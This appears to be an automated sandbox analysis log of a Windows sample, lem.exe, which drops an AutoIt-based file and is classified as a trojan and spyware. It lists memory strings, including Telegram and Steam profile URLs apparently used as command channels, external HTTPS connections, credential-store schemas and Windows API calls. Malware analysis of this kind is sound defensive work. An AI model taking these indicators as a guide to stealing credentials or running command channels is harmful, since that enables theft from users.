            Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1926073805.0000000004550000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925711453.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819153926.0000000001B09000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004BE1000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925550277.0000000001B25000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819810606.00000000044B2000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927
            Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
            Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Corrections.com, 0000000A.00000002.2820141571.0000000004556000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Corrections.com, 0000000A.00000002.2820141571.0000000004532000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Corrections.com, 0000000A.00000002.2820141571.0000000004556000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Corrections.com, 0000000A.00000002.2820141571.0000000004532000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Corrections.com, 0000000A.00000002.2819153926.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1924813167.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925875722.0000000001BA9000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925133553.00000000044BC000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925411138.000000000468C000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925795153.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925605271.000000000468C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1926073805.0000000004550000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925711453.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819153926.0000000001B09000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004C3A000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004BE1000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925550277.0000000001B25000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819810606.00000000044B2000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r
            Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0rP
            Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
            Source: Corrections.com, 0000000A.00000002.2819153926.0000000001ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/z
            Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004C3A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: Colonial.0.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
            Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
            Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
            Source: chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
            Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
            Source: chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
            Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
            Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
            Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
            Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
            Source: chrome.exe, 0000000F.00000003.2166777745.00004130030E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2169606836.0000413003058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
            Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=q_dnp
            Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
            Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.241:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_0099F7C7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_0099F55C
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_009B9FD2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00994763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00994763
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00981B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00981B4D
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_0098F20D
            Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\FocusingPlayerJump to behavior
            Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\MasterCostumeJump to behavior
            Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\CompletionAnimationJump to behavior
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_0040737E0_2_0040737E
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406EFE0_2_00406EFE
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004079A20_2_004079A2
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004049A80_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0094801710_2_00948017
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0092E1F010_2_0092E1F0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0093E14410_2_0093E144
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009422A210_2_009422A2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009222AD10_2_009222AD
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0095A26E10_2_0095A26E
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0093C62410_2_0093C624
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009AC8A410_2_009AC8A4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0095E87F10_2_0095E87F
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00956ADE10_2_00956ADE
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00992A0510_2_00992A05
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00988BFF10_2_00988BFF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0093CD7A10_2_0093CD7A
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0094CE1010_2_0094CE10
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0095715910_2_00957159
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0092924010_2_00929240
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009B531110_2_009B5311
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009296E010_2_009296E0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0094170410_2_00941704
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00941A7610_2_00941A76
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00947B8B10_2_00947B8B
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00929B6010_2_00929B60
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00947DBA10_2_00947DBA
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00941D2010_2_00941D20
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00941FE710_2_00941FE7
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\628056\Corrections.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: String function: 00940DA0 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: String function: 0093FD52 appears 40 times
            Source: C:\Users\user\Desktop\lem.exeCode function: String function: 004062CF appears 57 times
            Source: lem.exeStatic PE information: invalid certificate
            Source: lem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: TR9Z5X.10.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@44/48@5/6
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009941FA GetLastError,FormatMessageW,10_2_009941FA
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00982010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00982010
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00981A0B AdjustTokenPrivileges,CloseHandle,10_2_00981A0B
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_0098DD87
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00993A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00993A0E
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YZPV0N3M.htmJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1720:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
            Source: C:\Users\user\Desktop\lem.exeFile created: C:\Users\user\AppData\Local\Temp\nss945C.tmpJump to behavior
            Source: lem.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\lem.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: O8GVASR9H.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: lem.exeReversingLabs: Detection: 15%
